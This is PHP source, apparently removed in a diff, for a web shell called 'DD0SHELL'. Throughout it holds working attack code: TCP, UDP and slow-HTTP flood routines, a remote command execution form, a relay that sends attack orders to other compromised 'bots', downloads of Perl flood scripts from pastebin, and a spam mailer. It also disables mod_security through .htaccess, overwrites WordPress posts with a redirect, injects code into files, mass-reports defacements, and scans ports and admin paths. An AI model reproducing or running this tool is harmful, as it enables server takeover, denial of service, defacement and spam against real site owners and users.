- $host = $_POST['ipslow'];
- $port = 80;
- $time = $_POST['time'];
- $headers = "GET / HTTP/1.1\r\nHost: {$host}\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36\r\n\r\n";
- $timei = time();
- $fs = array();
- while (time() - $timei < $time) {
- for ($i = 0; $i < 100; $i++){
- $fs[$i] = @fsockopen($host, $port, $errno, $errstr);
- fwrite($fs[$i], $headers);
- }
- while (time() - $timei < $time) {
- for ($i = 0; $i < count($fs); $i++) {
- if (!$fs[$i]){
- $fs[$i] = @fsockopen($host, $port, $errno, $errstr);
- fwrite($fs[$i], $headers);
- }
- fread($fs[$i], 1);
- }
- sleep(mt_rand(0.5, 2));
- }
- script();
- }
- $timei = time();
- $host = $_POST['host'];
- $port = $_POST['port'];
- $time = $_POST['time'];
- $max = $time + $timei;
- while (1) {
- $pack++;
- if(time() > $max){
- break;
- }
- $fp = fsockopen($host, $port, $dummy, $dummy, 1);
- fclose($fp);
- }
- if(isset($_POST['server']) && isset($_POST['mhtd'])){
- $host = $_POST['host'];
- $server = $_POST['server'];
- $mthd = $_POST['mthd'];
- $port = 80;
- $time = 7;
- $timei = time();
- $fs = array();
- $request = "$mthd / HTTP/1.1\r\n";
- $request .= "Host: $host\r\n";
- $request .= "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n";
- $request .= "Keep-Alive: 900\r\n";
- $request .= "Content-Length: " . rand(10000, 1000000) . "\r\n";
- $request .= "Accept: *.*\r\n";
- $timei = time();
- for ($i = 0; $i < 100; $i++) {
- $fs[$i] = @fsockopen($server, 80, $errno, $errstr);
- }
- while ((time() - $timei < $time)) {
- for ($i = 0; $i < 100; $i++) {
- if (@fwrite($fs[$i], $request)) {
- continue;
- } else {
- $fs[$i] = @fsockopen($server, 80, $errno, $errstr);
- }
- }
- }
- }
- function ddospingpanel(){
- $a = $_POST['iping'];
- echo ping($a, 80, 10);
- script();
- }
- if(isset($_POST['ip11']) && isset($_POST['time11'])){
- $timei = time();
- $host = $_POST['ip11'];
- $time = $_POST['time11'];
- $i = 0;
- for ($i = 0; $i < 100; $i++) {
- $fs[$i] = @fsockopen($host, 80, $errno, $errstr);
- }
- while ((time() - $timei < $time)) {
- for ($i = 0; $i < 100; $i++) {
- $out = "POST / HTTP/1.1\r\n";
- $out .= "Host: {$host}\r\n";
- $out .= "User-Agent: Opera/9.21 (Windows NT 5.1; U; en)\r\n";
- $out .= "Content-Length: " . rand(1, 1000) . "\r\n";
- $out .= "X-a: " . rand(1, 10000) . "\r\n";
- if (@fwrite($fs[$i], $out)) {
- continue;
- } else {
- $fs[$i] = @fsockopen($server, 80, $errno, $errstr);
- }
- }
- }
- }
- if(isset($_POST['ip'])){
- $host = $_POST['ip'];
- $pps = 5000;
- $tune = 125;
- $uslp = (1000000 / $pps) - $tune;
- if($uslp < 0)
- $uslp = 0;
- for ($i=6500000; $i > 0 ; $i--) {
- $port = rand(1025, 65535);
- $fp = fsockopen('udp://'.$host,$port,$errno,$errstr,5);
- fwrite($fp, $i);
- fclose($fp);
- usleep($uslp);
- }
- }
- // --------------------------------------------------------------------------------------------------------------------------------------------------------------
- function Readfile1(){
- shape();
- print '<center><form method="post">
- <input type="text" placeholder="command" name="exe">
- <input type="submit" value="Run" name="button119"></form></center>';
- echo "[#] Uname: ".php_uname()."<br/><br/>";
- backconnect();
- if (isset($_POST['button119'])){
- $cmd = $_POST['exe'];
- echo "<pre>".shell_exec($cmd)."</pre>";
- }
- print '<div class="layer1"><hr align="center" width="1350" size="2" color="#A9A9A9" /></div>';
- echo "[#] Directory: ".$_SERVER['DOCUMENT_ROOT']."<br/><br/>";
- print '<font color="A9A9A9">Enter a link to the shell to check whether it is online<br/><br/></font>';
- print'<div align="left"><form action="" method="POST">
- <input type="text" name="sites" placeholder="site">
- <input type="submit" value="Go "name="subms">
- </form></div>';
- if (isset($_POST['subms'])) {
- $url = new DOMDocument();
- $url->loadHTMLFile($_POST['sites']);
- $url->saveHTML();
- if (stristr($url->saveHTML(), 'DD0SHELL')) {
- $a =$_SESSION["count"]++;
- }
- array_push($as, $_POST['sites']);
- foreach($as as $val){
- $_SESSION['checkbox'][] = $val;
- }
- }
- print '<style> .leftstr, .rightstr { float: left; width: 50%; } .rightstr { text-align: right; } </style> <body>
- <p class="leftstr">DD0SHELL online: </p>
- <p class="rightstr">'.$a.'</p>
- <p style="clear: left"></div>
- </body>';
- print '<center><font color="A9A9A9">Resolve host to ip address<br/><br/></font><form method="POST">
- <input type="text" name="address" placeholder="address">
- <input type="submit" name="go55" value="Resolve "></form></center>';
- if(isset($_POST['go55'])){
- $result = gethostbyname($_POST['address']);
- echo '<center>'.$result.'</center><br/>';
- }
- print '<center><font color="#000000 ">Ddos ∞<br/><br/></font></center>';
- print '<center><font color="#000000 ">
- By clicking on the link or typing in the url instead of parentheses, specify the IP address of the target<br/><br/></font>';
- print"<font color='A9A9A9'><a style='text-decoration: none;' href=".$_SERVER['PHP_SELF']."?action=ddos&ip=[]&time=3>".$_SERVER['PHP_SELF']."?action=ddos&ip=[]&time=3"."</a></font>   ";
- print"<font color='A9A9A9'><a style='text-decoration: none;' href=".$_SERVER['PHP_SELF']."?action=ddos2&ip=[]&time=3>".$_SERVER['PHP_SELF']."?action=ddos2&ip=[]&time=3"."</a></font>   ";
- print"<font color='A9A9A9'><a style='text-decoration: none;' href=".$_SERVER['PHP_SELF']."?action=ddos3&ip=[]&time=3>".$_SERVER['PHP_SELF']."?action=ddos3&ip=[]&time=3"."</a></font>   ";
- print"<font color='A9A9A9'><a style='text-decoration: none;' href=".$_SERVER['PHP_SELF']."?action=ddos4&ip=[]&time=3>".$_SERVER['PHP_SELF']."?action=ddos4&ip=[]&time=3"."</a></font>   ";
- print"<font color='A9A9A9'><a style='text-decoration: none;' href=".$_SERVER['PHP_SELF']."?action=ddos5&ip=[]&time=3>".$_SERVER['PHP_SELF']."?action=ddos5&ip=[]&time=3"."</a></font>   ";
- print"<font color='A9A9A9'><a style='text-decoration: none;' href=".$_SERVER['PHP_SELF']."?action=doSlow&ip=[]&time=3>".$_SERVER['PHP_SELF']."?action=doSlow&ip=[]&time=3"."</a></font>   ";
- print"?action=ddosintel&ip=[]>   ";
- print"?action=attack_http&ip=[]&host=[]&mthd=[]>   <br/><br/><br/></center>";
- but();
- print'<br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><center><font color="A9A9A9">Send bot command<br/><br/></font></center>';
- print'<center><form method="post">
- <select name="dos">
- <option value="udp">UDP</option>
- <option value="SlowRead">SlowRead</option>
- <option value="d">doSlow</option>
- <option value="tcp">TCP</option>
- </select>
- <input type="text" name="ip" placeholder="ip">
- <input type="text" name="time" placeholder="time">
- <input type="text" name="exploit" placeholder="Address where the bot is located">
- <input type="submit" name="send" value="Send"/>
- </form>
- </center>';
- $d = $_POST['ip'];
- $f = $_POST['time'];
- $g = $_POST['dos'];
- $paramsArray = array(
- 'ip' => $d,
- 'time' => $f,
- 'dos' => $g
- );
- $vars = http_build_query($paramsArray);
- $options = array(
- 'http' => array(
- 'method' => 'POST',
- 'header' => 'Content-type: application/x-www-form-urlencoded',
- 'content' => $vars,
- )
- );
- $context = stream_context_create($options);
- $result = file_get_contents($_POST['exploit'], false, $context);
- print '<center><font color="A9A9A9">Remote upload of files<br/><br/></font></center>';
- print'<center><form method="POST">
- <input type="text" name="f" placeholder="code">
- <input type="text" name="exploit" placeholder="Address where the bot is located">
- <input type="submit" name="send1" value="Send"/>
- </form></center>';
- $d = $_POST['f'];
- $paramsArray = array(
- 'f' => $d
- );
- $vars = http_build_query($paramsArray);
- $options = array(
- 'http' => array(
- 'method' => 'POST',
- 'header' => 'Content-type: application/x-www-form-urlencoded',
- 'content' => $vars,
- )
- );
- $context = stream_context_create($options);
- $result = file_get_contents($_POST['exploit'], false, $context);
- print '<center><font color="A9A9A9">Perl dos script<br/><br/></font></center>';
- print '<center><font color="A9A9A9">Download -> edit -> start<br/><br/></font></center>';
- print '<center><font color="A9A9A9">backconnect<br/><br/></font></center>';
- print '<center><font color="A9A9A9">$ perl file.pl 192.168.1.102 6666 192.168.1.1 80<br/><br/></font></center>';
- print '<center><form method="post">
- <select name="dos1">
- <option value="pl1">ddos.pl</option>
- <option value="pl2">synflood.pl</option>
- <option value="pl3">udpflood.pl</option>
- </select>
- <input type="submit" name="pld" value="download">
- </form>
- </center>';
- if(isset($_POST['pld'])){
- if($_POST['dos1'] == 'pl1'){
- $a = file_get_contents('http://pastebin.com/raw/VUEbr3k4');
- $f = fopen('func.pl', 'w');
- fwrite($f, $a);
- fclose($f);
- }
- if($_POST['dos1'] == 'pl2'){
- $a = file_get_contents('http://pastebin.com/raw/XjcfST6c');
- $f = fopen('cmd.pl', 'w');
- fwrite($f, $a);
- fclose($f);
- }
- if($_POST['dos1'] == 'pl3'){
- $a = file_get_contents('http://pastebin.com/raw/x9V70A06');
- $f = fopen('udp.pl', 'w');
- fwrite($f, $a);
- fclose($f);
- }
- }
- if(isset($_GET['to']) && isset($_GET['from']) && isset($_GET['subject']) && isset($_GET['message'])){
- mail($_GET['to'],$_GET['subject'],$_GET['message'],"From:".$_GET['from']);
- }
- print'<center><font color="A9A9A9">Spam<br/><br/></font></center>';
- print'<center><form method="GET">
- <input type="hidden" name="mail" />
- From:<br/>
- <input class="cmd" name="from" value=""/><br/>
- To:<br/>
- <input class="cmd" name="to" value=""/><br/>
- Subject:<br/>
- <input type="text" class="cmd" name="subject" /><br/>
- <textarea name="message" cols="178" rows="10" class="cmd" placeholder="link"></textarea><br/>
- <input type="submit" class="own" value="Send!"/>
- </form></center>';
- $name = scandir('.');
- echo '<table width="100%" cellpadding="5" border="1" bordercolor="Grey">';
- for($i=2; $i<=(sizeof($name)-1); $i++) {
- echo "<style> tbody tr:hover { background: #A9A9A9; color: #fff; } a {text-decoration: none;}a:hover { text-decoration: none; color: #C0C0C0; }</style><tr><td><body link='black' vlink='#000000'><form method='post'><input type='checkbox' name='formWheelchair[]' value='$name[$i]' /><a href='".$dir.$name[$i]."'>".$name[$i]."</a></body>"."</td><td>".filesize($name[$i]).' byte </td><td>'.perms($name[$i])."</td><td>".date("F d Y H:i:s.",filemtime($name[$i]))."</td><td><a href='$name[$i]' download>download</a></td></tr>"; }
- echo "</table><br/>";
- print'<form action="" method="post">
- <input type="submit" name="formSubmit" value="Delete" />
- <input type="submit" name="formSubmit1" value="Zip"/><br/>
- </form>';
- if(isset($_POST['formSubmit'])){ $aDoor = $_POST['formWheelchair']; $N = count($aDoor); for($i = 0; $i < $N; $i++) { unlink($aDoor[$i]); } }
- else if(isset($_POST['formSubmit1'])){ $aDoor = $_POST['formWheelchair']; $N = count($aDoor); for($i = 0; $i < $N; $i++) { $aDoor = $_POST['formWheelchair']; $N = count($aDoor); for($i = 0; $i < $N; $i++) {
- $testzip = 'test.zip';
- $zip = new ZipArchive;
- if (true === $zip->open($testzip, ZIPARCHIVE::CREATE)) {
- $zip->addFile($aDoor[$i], 'newname.php');
- $zip->addEmptyDir('dir3');
- $zip->addFile(__FILE__, 'dir3/' . pathinfo(__FILE__, PATHINFO_FILENAME));
- $zip->close();
- } else echo 'No' . $testzip; }}}
- echo "\n--------------------------------------------------------------------------------------------------------------------------------------------"."<br/>";
- print '<div class="layer1"><hr align="center" width="1350" size="2" color="#A9A9A9" /></div>';
- print '<form method="POST">
- <input name="php" placeholder="File">
- <input type="submit" name="php1" value="Read">
- </form>'."<br/>";
- print'<form action="" method="post">
- <textarea cols="100" rows="10" name="memo">';$a=file_get_contents($_POST["php"],"a+"); echo $a; file_put_contents($_GET['php'], $_GET['php1'],FILE_APPEND); print '</textarea>'."<br/><br/>";
- print '<form method="POST">
- <input type="text" name = "dir1" value="'.$_SERVER['DOCUMENT_ROOT'].'">
- <input type="submit" name="GO2" value="Go">'."<br/><br/>";
- if (isset($_POST['GO2'])){
- $spisok = '';
- $dir = $_POST['dir1'];
- $f1 = scandir($dir,1);
- foreach ($f1 as $value) {
- $spisok .= $value."<br/>";
- }
- echo "\n--------------------------------------------------------------------------------------------------------------------------------------------"."<br/>";
- echo $spisok;
- echo "\n--------------------------------------------------------------------------------------------------------------------------------------------"."<br/>";}
- print '<form method="POST">
- <input type="text" name = "New1" placeholder="NewFile">
- <input type="text" name = "New2" placeholder="a,r,w">
- <input type="submit" name="GO3" value="Go">'."<br/><br/>";
- if (isset($_POST['GO3'])){
- $f = fopen($_POST['New1'], $_POST['New2']);
- fclose($f);
- }
- print '<form method="POST">
- <input type="text" name="dl" placeholder="File">
- <input type="text" name="rm" placeholder="Dir">
- <input type="submit" name="run" value="Delete">
- </form>'."<br/><br/>";
- if (isset($_POST['run'])){
- unlink($_POST['dl']);
- rmdir($_POST['rm']);
- }
- print '<form method="POST">
- <input type="text" name="dir2" placeholder="New">
- <input type="submit" name="run3" value="NewDir">
- </form>'."<br/>";
- if (isset($_POST['run3'])){
- mkdir($_POST['dir2'], 0700);
- }
- print '<form method="POST">
- <input type="text" name="myzip" placeholder="Zip">
- <input type="text" name="zip" placeholder="File">
- <input type="submit" name="zip1" value="Go">
- </form>'."<br/>";
- if (isset($_POST['zip1'])){
- $testzip = $_POST['myzip'];
- $zip = new ZipArchive;
- if (true === $zip->open($testzip, ZIPARCHIVE::CREATE)) {
- $zip->addFile($_POST['zip'], 'newname.php');
- $zip->addEmptyDir('dir3');
- $zip->addFile(__FILE__, 'dir3/' . pathinfo(__FILE__, PATHINFO_FILENAME));
- $zip->close();
- } else echo 'No' . $testzip;
- }
- print '<form method="POST">
- <input type="text" name="my" placeholder="File">
- <input type="text" name="copy" placeholder="File2">
- <input type="submit" name="run1" value="Copy">
- </form>'."<br/>";
- if (isset($_POST['run1'])){
- copy($_POST['my'],$_POST['copy']);
- }
- print '<form method="POST">
- <input type="text" name="ren1" placeholder="Old">
- <input type="text" name="ren2" placeholder="New">
- <input type="submit" name="run2" value="Rename">
- </form>'."<br/>";
- if (isset($_POST['run2'])){
- rename($_POST['ren1'], $_POST['ren2']);
- }
- print '<form method="POST">
- <input type="text" name="file" placeholder="File">
- -
- <input type="text" name="time" placeholder="time">
- <input type="submit" name="touch" value="Touch">
- </form>'."<br/>";
- if(isset($_POST['touch'])){ $time = time()-$_POST['time']; touch($_POST['file'],$time); }
- print'<form method="post" enctype="multipart/form-data">
- <input type="file" name="filename">
- <input type="text" name="dir" value='.$_SERVER['DOCUMENT_ROOT'].'>
- <input type="submit" value="upload"><br><br/>
- </form>';
- $uploaddir = $_POST['dir'];
- $uploadfile = $uploaddir . basename($_FILES['filename']['name']);
- move_uploaded_file($_FILES['filename']['tmp_name'], $uploadfile);
- print '<form method="POST">
- <input type="submit" name="del" value="KiLL"><br/>';
- if(isset($_POST['del'])){
- unlink(__FILE__);
- cmdexec('kill -9 $$;');
- unlink('a.out');
- unlink('whitecat.c');
- unlink('w.txt');
- }
- }
- function scannport(){
- shape1();
- print'<center><form method="POST">
- <input type="text" name="hostscan">
- <input type="submit" name="scan" value="Scan">
- </form></center>';
- if (isset($_POST['scan'])){
- $host = $_POST['hostscan'];
- $ports = array(21,25,80,82,110,121,143,443,444,587,3306);
- foreach ($ports as $port) {
- $connect = @fsockopen($host,$port,$errno,$errstr,2);
- if (is_resource($connect)){
- echo '<h2 style="color:#ff0000"><center>'.$host.':'.$port.' '.getservbyport($port, 'tcp').' open'.'</center></h2>'."\n";
- fclose($connect);
- }
- else{
- echo '<h2 style="color:#ff0000"><center>'.$host.':'.$port.' close'.'</center></h2>'."\n";
- }
- }
- }
- print '<div class="layer1"><hr align="center" width="1350" size="2" color="#A9A9A9" /></div>';
- }
- function file_search($path, $filename) {
- if(($dir = opendir($path)) == FALSE)
- return '';
- $link = '';
- while(($fp = readdir($dir)) !== FALSE) {
- $link = $path . '/' . $fp;
- if(is_file($link)) {
- if($fp == $filename) {
- closedir($dir);
- return $link;
- }
- }else if(! ereg('^[\.]{1,2}$', $fp) && is_dir($link)) {
- if(($link = file_search($link, $filename)) != '') {
- closedir($dir);
- return $link;
- }
- }
- }
- closedir($dir);
- return '';
- }
- function disable1(){
- shape();
- print '<center><form method="POST">
- <input type="text" name="Malware" value="'.$_SERVER['DOCUMENT_ROOT'].'">
- <input type="text" name="file" placeholder="File">
- <input type="submit" name="Run" value="Run">
- <input type="submit" name="off" value="OFF mod_security">
- </form></center>';
- if(isset($_POST['file'])){
- $x = file_search($_GET['file'], '.htaccess');
- if($x){
- echo '<center><h2><font color="red">Disable</font></h2></center>';
- $f = fopen($x, 'w');
- fwrite($f, 'AddHandler cgi-script .izo');
- fclose($f);
- }
- }
- print '<center><form method="POST">
- <input type="text" name="direc" value="'.$_SERVER['DOCUMENT_ROOT'].'">
- <input type="text" name="file" placeholder="File">
- <input type="submit" name="Run" value="Search">
- </form></center>';
- if(isset($_POST['Run'])){ $x = file_search($_POST['direc'], $_POST['file']); if($x){print'<form action="">
- <textarea cols="100" rows="10" name="memo">'; echo file_get_contents($_POST['file']); print'</textarea>';} }
- if(isset($_POST['Run'])){ $x = file_search($_POST['Malware'], '.htaccess'); $f = fopen('404.html', 'w'); fwrite($f, 'Faric'); fclose($f); if($x){$f = fopen($x, 'a+'); fwrite($f, "\nErrorDocument 404 /404.html"); fclose($f); echo '<center><h2><font color="red">Disable</font></h2></center>'; }else{ $f = fopen('.htaccess','w'); fwrite($f, "\nErrorDocument 404 /404.html"); fclose($f); } }
- if(isset($_POST['off'])){$x = file_search($_POST['Malware'], '.htaccess'); if($x){$f = fopen($x, 'a+'); fwrite($f, "\n<IfModule mod_security.c>
- SecFilterEngine Off
- SecFilterScanPOST Off
- </IfModule>");
- fclose($f); echo '<center><h2><font color="red">Disable</font></h2></center>'; } }
- print '<div class="layer1"><hr align="center" width="1350" size="2" color="#A9A9A9" /></div>';
- $a = header("Location: ");
- }
- function word(){
- shape();
- echo '<form method="POST">
- <p align="center">
- <img border="0" src="http://oi59.tinypic.com/33uucdu.jpg"></p>
- <center><font color="red" size="6" face="impact">Wordpress Index Hijack Priv8</font></center>
- <center><font color="red" size="2" face="orion">Coded By Mauritania Attacker</font></center>
- <center><input type="text" value="localhost" name="pghost">
- <input type="text" value="database_name" name="dbnmn">
- <input type="text" value="prefix" name="prefix">
- <input type="text" value="username_db" name="dbusrrrr">
- <input type="text" value="password_db" name="pwddbbn"></center><br>
- <center><textarea name="pown" cols="85" rows="10"><meta http-equiv="refresh" content="0;URL=http://pastebin.com/raw.php?i=WG1zASMG"></textarea><br>
- <input type="submit" name="up2" value="Hijack Index"><br></center><form>';
- $pghost = $_POST['pghost'];
- $dbnmn = $_POST['dbnmn'];
- $dbusrrrr = $_POST['dbusrrrr'];
- $pwddbbn = $_POST['pwddbbn'];
- $index = stripslashes($_POST['pown']);
- $prefix = $_POST['prefix'];
- if ($_POST['up2']) {
- @mysql_connect($pghost, $dbusrrrr, $pwddbbn) or die(mysql_error());
- @mysql_select_db($dbnmn) or die(mysql_error());
- $tableName = $prefix . "posts";
- $ghost1 = mysql_query("UPDATE $tableName SET post_title ='" . $index . "' WHERE ID > 0 ");
- if (!$ghost1) {
- $ghost2 = mysql_query("UPDATE $tableName SET post_content ='" . $index . "' WHERE ID > 0 ");
- } elseif (!$ghost2) {
- $ghost3 = mysql_query("UPDATE $tableName SET post_name ='" . $index . "' WHERE ID > 0 ");
- }
- mysql_close();
- if ($ghost1 || $ghost2 || $ghost3) {
- echo "<center><p><b><font color='red'>Index Website Have been Hijacked Successfully</font></p></b></center>";
- } else {
- echo "<center><p><b><font color='red'>Failed To Hijack the Website :(</font></p></b></center>";
- }
- }
- print '<div class="layer1"><hr align="center" width="1350" size="2" color="#A9A9A9" /></div>';
- }
- function mass_shell(){
- shape();
- print'<center>
- <form method="POST">
- Hacker Name : <input type="text" name="defacer" size="32" style="border: solid 1px red">   Mirror :
- <select style="border: solid 1px red" name="mirror">
- <option>zone-h</option>
- <option>dark-h</option>
- <option>aljyyosh.org</option>
- </select><br>
- Domains :<br><textarea style="width: 678px; height: 302px;border: solid 1px red" name="domains"></textarea><br>
- <input type="submit" value="Send" name="go">
- </form></center>
- <br><center><font face="Agency FB" size="3px">';
- set_time_limit (0);
- if (!function_exists ("curl_init")){die ("This Script uses cURL Library, you must install first !<br><a href='http://au2.php.net/manual/en/curl.setup.php'>http://au2.php.net/manual/en/curl.setup.php</a>");}
- if (@$_POST['go']){
- foreach (explode ("\n", $_POST['domains']) as $domain)
- {
- post ($domain, $_POST['defacer'], $_POST['mirror']);
- }
- echo "<br><br><a target='_blank' href='http://zone-h.com/archive/published=0'>Zone-h</a><br>";
- echo "<a target='_blank' href='http://dark-h.org/onhold/?s=1'>Dark-h</a><br>";
- echo "<a target='_blank' href='http://aljyyosh.org/onhold.php'>Aljyyosh.org</a>";
- }
- function post ($url, $defacer, $mirror)
- {
- $ch = curl_init ();
- curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt ($ch, CURLOPT_POST, 1);
- switch ($mirror)
- {
- case "zone-h";
- curl_setopt ($ch, CURLOPT_URL, "http://www.zone-h.com/notify/single");
- curl_setopt ($ch, CURLOPT_POSTFIELDS, "defacer=$defacer&domain1=$url&hackmode=1&reason=1");
- if (preg_match ("/color=\"red\">OK<\/font><\/li>/", curl_exec ($ch)))
- echo "$url.      <span style='color: green'>OK</span><br>";
- else
- echo "$url      <span style='color: red'>Error</span><br>";
- break;
- case "dark-h";
- curl_setopt ($ch, CURLOPT_URL, "http://dark-h.org/notify/kaydet.php");
- curl_setopt ($ch, CURLOPT_POSTFIELDS, "hacker=$defacer&site=$url&gkodumuz=123456&zgkod=123456&kod=123456");
- curl_exec ($ch);
- echo "$url<br>";
- break;
- case "aljyyosh.org";
- curl_setopt ($ch, CURLOPT_URL, "http://aljyyosh.org/single.php");
- curl_setopt ($ch, CURLOPT_COOKIE, "alj=aljyyosh");
- curl_setopt ($ch, CURLOPT_POSTFIELDS, "hacker=$defacer&site=$url&how=1&why=1&addsite=Send");
- if (preg_match ("/<font color=red> OK<\/font>/", curl_exec ($ch)))
- echo "$url      <span style='color: green'>OK</span><br>";
- else
- echo "$url      <span style='color: red'>Error</span><br>";
- break;
- default:
- break;
- }
- curl_close ($ch);
- }
- }
- function shape(){
- echo '<title>itsokyesrproblembro</title><style>body {background-image: url(https://wallpaperscraft.ru/image/super_sonico_anime_devushka_majka_96475_1280x1024.jpg);background-repeat: repeat-y, repeat-y;background-attachment: fixed, fixed;}
- </style><body background="https://wallpaperscraft.ru/image/super_sonico_anime_devushka_majka_96475_1280x1024.jpg"></body>';
- print '<!DOCTYPE html>
- <html><head><title></title></head><body><center><h1>DD0SHELL</h1></center>
- <hr align="center" width="1350" size="2" color="#A9A9A9" /><br></body></html>';
- $index = $_SERVER['DOCUMENT_ROOT'].'/index.php';
- }
- function incode(){
- shape();
- print '<center><h2 style="color:#ff0000">Inject code</h2></center>';
- print "<center><form method='POST' action=''>
- <input type='text' name='namefile' placeholder='name'><br/>
- <input type='text' name='dir' value=".$_SERVER['DOCUMENT_ROOT'].'/'."><br/><br/>
- <textarea cols='100' rows='10' placeholder='text' name='dor'></textarea><br/><br/>
- <input type='submit' name='enter' value='Inject'>
- </form></center>";
- if(isset($_POST['enter'])){
- $f = fopen($_POST['dir'].$_POST['namefile'], "w");
- fwrite($f, $_POST['dor']);
- fclose($f);
- }
- print '<div class="layer1"><hr align="center" size="2" color="#A9A9A9" /></div>';
- }
- function infection(){
- shape();
- if (isset($_GET['home'])){
- $fp = fopen($_GET['home'], 'a+');
- fwrite($fp, "\r\n".$_GET['inf']);
- echo "<center><h3>Good</h3></center>";
- fclose($fp);
- }
- print '<div class="layer1"><hr align="center" size="2" color="#A9A9A9" /></div>';
- }
- // revslider.php ---
- function adminfinder(){
- shape();
- echo'
- <center><form action ="" method="post">
- <font face=Verdana size=-2 color=wgite >URL : <input type ="text" name="site"/>
- <input type = "submit" value="Find" />
- </form><br/><br/>';
- $site = $_POST['site'];
- $list = array(
- '/phpMyAdmin/','/phpmyadmin/','/PMA/','/pma/','/admin/','/dbadmin/','/DB_ADMIN/','/db_admin/','/DBA/','/SQLI/','/dba/','/sqli/','/mysql/','/myadmin/','/phpmyadmin2/','/phpMyAdmin2/','/phpMyAdmin-2/','/php-my-admin/','/phpMyAdmin-2.2.3/','/phpMyAdmin-2.2.6/','/phpMyAdmin-2.5.1/','/phpMyAdmin-2.5.4/','/phpMyAdmin-2.5.5-rc1/','/phpMyAdmin-2.5.5-rc2/','/phpMyAdmin-2.5.5/','/phpMyAdmin-2.5.5-pl1/','/phpMyAdmin-2.5.6-rc1/','/phpMyAdmin-2.5.6-rc2/','/phpMyAdmin-2.5.6/','/phpMyAdmin-2.5.7/','/phpMyAdmin-2.5.7-pl1/','/phpMyAdmin-2.6.0-alpha/','/phpMyAdmin-2.6.0-alpha2/','/phpMyAdmin-2.6.0-beta1/','/phpMyAdmin-2.6.0-beta2/','/phpMyAdmin-2.6.0-rc1/','/phpMyAdmin-2.6.0-rc2/','/phpMyAdmin-2.6.0-rc3/','/phpMyAdmin-2.6.0/','/phpMyAdmin-2.6.0-pl1/','/phpMyAdmin-2.6.0-pl2/','/phpMyAdmin-2.6.0-pl3/','/phpMyAdmin-2.6.1-rc1/','/phpMyAdmin-2.6.1-rc2/','/phpMyAdmin-2.6.1/','/phpMyAdmin-2.6.1-pl1/','/phpMyAdmin-2.6.1-pl2/','/phpMyAdmin-2.6.1-pl3/','/phpMyAdmin-2.6.2-rc1/','/phpMyAdmin-2.6.2-beta1/','/phpMyAdmin-2.6.2-rc1/','/phpMyAdmin-2.6.2/','/phpMyAdmin-2.6.2-pl1/','/phpMyAdmin-2.6.3/','/phpMyAdmin-2.6.3-rc1/','/phpMyAdmin-2.6.3/','/phpMyAdmin-2.6.3-pl1/','/phpMyAdmin-2.6.4-rc1/','/phpMyAdmin-2.6.4-pl1/','/phpMyAdmin-2.6.4-pl2/','/phpMyAdmin-2.6.4-pl3/','/phpMyAdmin-2.6.4-pl4/','/phpMyAdmin-2.6.4/','/phpMyAdmin-2.7.0-beta1/','/phpMyAdmin-2.7.0-rc1/','/phpMyAdmin-2.7.0-pl1/','/phpMyAdmin-2.7.0-pl2/','/phpMyAdmin-2.7.0/','/phpMyAdmin-2.8.0-beta1/','/phpMyAdmin-2.8.0-rc1/','/phpMyAdmin-2.8.0-rc2/','/phpMyAdmin-2.8.0/','/phpMyAdmin-2.8.0.1/','/phpMyAdmin-2.8.0.2/','/phpMyAdmin-2.8.0.3/','/phpMyAdmin-2.8.0.4/','/phpMyAdmin-2.8.1-rc1/','/phpMyAdmin-2.8.1/','/phpMyAdmin-2.8.2/','/sqlmanager/','/mysqlmanager/','/p/m/a/','/PMA2005/','/pma2005/','/dev/','/phpmanager/','/php-myadmin/','/phpmy-admin/','/webadmin/','/sqlweb/','/websql/','/webdb/','/mysqladmin/','/mysql-admin/','/mya/','/PhpMyAdmin/','/phpmyadmin/','/myadmin/','/mysql/','/sql/','/server/','/db/','/database/','/databases/','/adm/','/configuration/','/configure/','/administrator/','/login/','/moderator/','/controlpanel/','/adminpanel/','/admincontrol/','/fileadmin/','/data/','/postgresql/','/oracle/','/msssql/','/msaccess/','/sysadmin/','/serverdata/','/webadmin/','/admins/','/Database_Administration/','/WebAdmin/','/useradmin/','/sysadmins/','/admin1/','/system-administration/','/administrators/','/pgadmin/','/directadmin/','/staradmin/','/ServerAdministrator/','/SysAdmin/','/administer/','/LiveUser_Admin/','/sys-admin/','/typo3/','/panel/','/xlogin/','/smblogin/','/phpldapadmin/','/server_admin/','/database_administration/','/system_administration/','/ss_vms_admin_sm/','/adminarea/','/MySQL/','/mysql_admin/','/server_data/','/DB/','/DB1/','/DB2/','/DB3/','/DB4/','/DB5/','/DB6/','/DB7/','/DB8/','/DB9/','/DB0/','/db1/','/db2/','/db3/','/db4/','/db5/','/db6/','/db7/','/db8/','/db9/','/db0/','/mysql5/','/mysql4/','/root/','/apache/','/php/','/Apache/','/Php/','/apach/','/apachepanel/','/WEBSERVERS/','/DATABASE1/','/DATABASE2/','/DATABASE3/','/DATABASE4/','/DATABASE5/','/DATABASE6/','/DATABASE7/','/DATABASE8/','/DATABASE9/','/WEBDATA/','/WEB_DATA/','/webservers/','/database1/','/database2/','/database3/','/database4/','/database5/','/database6/','/database7/','/database8/','/database9/','/webdata/','/web_data/','/admin/login.php','/adm','/admin/','/admin1.html/ADMIN/','/wp-login.php','wp-admin.php','/wp-login/','/moderator/admin.php','/login.html','/login.php','/admin/account.php','/administrator/index.html','administrator.php','/admincontrol.html','/admin_area/login.html','/admincontrol/login.asp','/administrator/login.asp',);
- if(isset($site)){
- foreach($list as $path => $test) {
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($ch, CURLOPT_HEADER, 1);
- curl_setopt($ch, CURLOPT_URL, $site.$test);
- $result = curl_exec($ch);
- curl_close($ch);
- if (preg_match("/200 OK/", $result)){
- echo "<br /><b><font face=Verdana size=-2 color=green >[+]</font><font face=Verdana size=-2 color=silver > Found ==> </font><font face=Verdana size=-2 color=orange ><a>[ $site$test ]</A></font></b>";
- }else if (preg_match("/401 Unauthorized/", $result)) {
- echo "<br /><b><font face=Verdana size=-2 color=yellow >[!]</font><font face=Verdana size=-2 color=silver > Found ==> </font><font face=Verdana size=-2 color=orange ><a>[ $site$test ]</A></font><a>[ $site$test ]</A></font></b>";
